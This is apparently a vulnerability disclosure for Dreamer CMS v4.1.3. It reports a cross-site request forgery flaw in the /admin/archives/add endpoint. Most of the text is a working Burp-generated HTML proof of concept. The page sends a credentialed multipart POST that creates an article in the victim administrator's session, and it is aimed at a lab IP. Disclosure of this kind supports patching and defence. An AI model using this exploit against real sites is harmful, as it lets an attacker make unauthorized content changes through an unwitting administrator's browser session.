There is a csrf in the newly added section of article management.md

Target is https://github.com/iteachyou-wjn/dreamer_cms

version:4.1.3

Dreamer CMS v4.1.3 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/archives/add

create poc：

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.247.186:8888\/admin\/archives\/add", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------118551003424823");
        xhr.withCredentials = true;
        var body = "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"categoryId\"\r\n" + 
          "\r\n" + 
          "46041acafe0444ac95870f165977b6a0\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"categoryIds\"\r\n" + 
          "\r\n" + 
          ".wqz18j7q\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"imagePath\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"title\"\r\n" + 
          "\r\n" + 
          "cs\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"weight\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"clicks\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"file\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"description\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"telephone\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"content\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"reply\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"comment\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"subscribe\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------118551003424823\r\n" + 
          "Content-Disposition: form-data; name=\"status\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "-----------------------------118551003424823--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

successed